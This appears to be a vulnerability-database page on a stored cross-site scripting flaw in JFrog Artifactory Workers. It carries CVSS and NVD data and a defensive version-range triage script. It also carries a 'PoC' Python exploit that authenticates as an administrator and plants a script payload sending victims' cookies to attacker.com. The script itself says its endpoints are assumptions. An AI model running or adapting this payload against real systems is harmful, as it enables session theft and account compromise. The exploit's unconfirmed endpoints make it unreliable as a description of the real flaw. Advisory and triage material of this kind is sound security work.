Security Vulnerability Report
CVE-2025-14830 CVSS 4.9 MEDIUM

CVE-2025-14830

Published: 2026-01-04 10:15:40
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JFrog Artifactory (Workers) allows Cross-Site Scripting (XSS). This issue affects Artifactory (Workers) from version 7.94.0 (inclusive) up to but not including 7.117.10. Per the CVSS vector (AV:N, PR:H, UI:N, S:U, C:H/I:N/A:N), an attacker needs a highly privileged account to plant the payload, no victim interaction is scored, and the scored impact is limited to confidentiality.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record (the raw JSON below carries no configurations node); the affected range that follows is taken from the description.

JFrog Artifactory (Workers) >= 7.94.0
JFrog Artifactory (Workers) < 7.117.10
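As an added example (not from the original page or from JFrog), a small Python triage helper that decides whether an Artifactory version string falls inside the affected range above. Versions are compared numerically component by component, because a plain string comparison mis-orders 7.117.2 against 7.117.10 and would wrongly clear an affected host. The embedded JSON bodies are constructed samples in the assumed shape of Artifactory's GET /artifactory/api/system/version reply; the HTTP request itself is left out so the code runs offline.

```python
import json
import re

# Affected range from the advisory: >= 7.94.0 and < 7.117.10
AFFECTED_FROM = "7.94.0"
FIXED_IN = "7.117.10"

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) as integers. A trailing build or
    milestone suffix such as '7.104.5-m001' is ignored; anything that does
    not start with three dotted numbers is rejected."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Artifactory version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True when version lies in [AFFECTED_FROM, FIXED_IN)."""
    v = parse_version(version)
    return parse_version(AFFECTED_FROM) <= v < parse_version(FIXED_IN)


def naive_string_check(version):
    """The wrong way: lexicographic comparison. Kept only to show the pitfall."""
    return AFFECTED_FROM <= version < FIXED_IN


def triage(responses):
    """Map host -> 'affected' / 'not affected' / 'unknown' from a dict of
    host -> raw JSON body of the system/version endpoint (assumed shape:
    a top-level "version" key)."""
    result = {}
    for host, body in responses.items():
        try:
            version = json.loads(body)["version"]
            result[host] = "affected" if is_affected(version) else "not affected"
        except (ValueError, KeyError):
            # Malformed JSON, unexpected version format, or no version key
            result[host] = "unknown"
    return result


# Constructed sample responses; not captured from real systems.
SAMPLE_RESPONSES = {
    "artifactory-a.example.internal": '{"version": "7.117.2"}',
    "artifactory-b.example.internal": '{"version": "7.117.10"}',
    "artifactory-c.example.internal": '{"version": "7.93.5"}',
    "artifactory-d.example.internal": '{"error": "forbidden"}',
}


if __name__ == "__main__":
    for host, status in triage(SAMPLE_RESPONSES).items():
        print(f"{host}: {status}")
    # '7.117.2' sorts after '7.117.10' as a string, so the naive check misses it.
    print("naive string check flags 7.117.2:", naive_string_check("7.117.2"))
```

The "unknown" outcome matters in practice: an endpoint that answers with an error page or requires authentication should be queued for manual follow-up rather than silently counted as not affected.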

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-14830 PoC - Stored XSS in JFrog Artifactory Workers
# Target: JFrog Artifactory < 7.117.10
#
# NOTE: the advisory only states that the Workers feature is affected by
# CWE-79 and that a highly privileged account is required (CVSS PR:H). The
# UI endpoint paths and JSON field names used below are this script's own
# assumptions and are not confirmed by the advisory; verify them against the
# target's API before relying on the result.

TARGET = "https://artifactory.example.com"
USERNAME = "admin"
PASSWORD = "password"

# XSS payload for the Workers module: sends document.cookie to the attacker host
XSS_PAYLOAD = '<script>document.location="https://attacker.com/log?c=' + \
    '"+document.cookie+"</script>'


def exploit():
    session = requests.Session()

    # Step 1: Authentication (endpoint path assumed, see note above)
    login_url = f"{TARGET}/ui/api/v1/auth/login"
    auth_data = {"user": USERNAME, "password": PASSWORD}
    # verify=False disables TLS certificate validation; acceptable only in a lab
    response = session.post(login_url, json=auth_data, verify=False)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False

    access_token = response.json().get("access_token")
    headers = {"Authorization": f"Bearer {access_token}"}

    # Step 2: Inject the payload into a Workers object (endpoint and fields assumed)
    workers_url = f"{TARGET}/ui/api/v1/workers"
    exploit_data = {
        "name": "Worker-Test",
        "description": XSS_PAYLOAD,
        "config": {"enabled": True}
    }
    response = session.post(workers_url, json=exploit_data, headers=headers, verify=False)

    if response.status_code in [200, 201]:
        print("[+] XSS payload injected successfully")
        print(f"[+] Payload: {XSS_PAYLOAD}")
        return True
    else:
        print(f"[-] Injection failed: {response.status_code}")
        return False


if __name__ == "__main__":
    exploit()

References

https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories (JFrog Security Advisories; the only reference in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14830",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-04T10:15:40.123",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in JFrog Artifactory (Workers) allows Cross-Site Scripting (XSS).This issue affects Artifactory (Workers): from >=7.94.0 through <7.117.10."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories",
        "source": "[email protected]"
      }
    ]
  }
}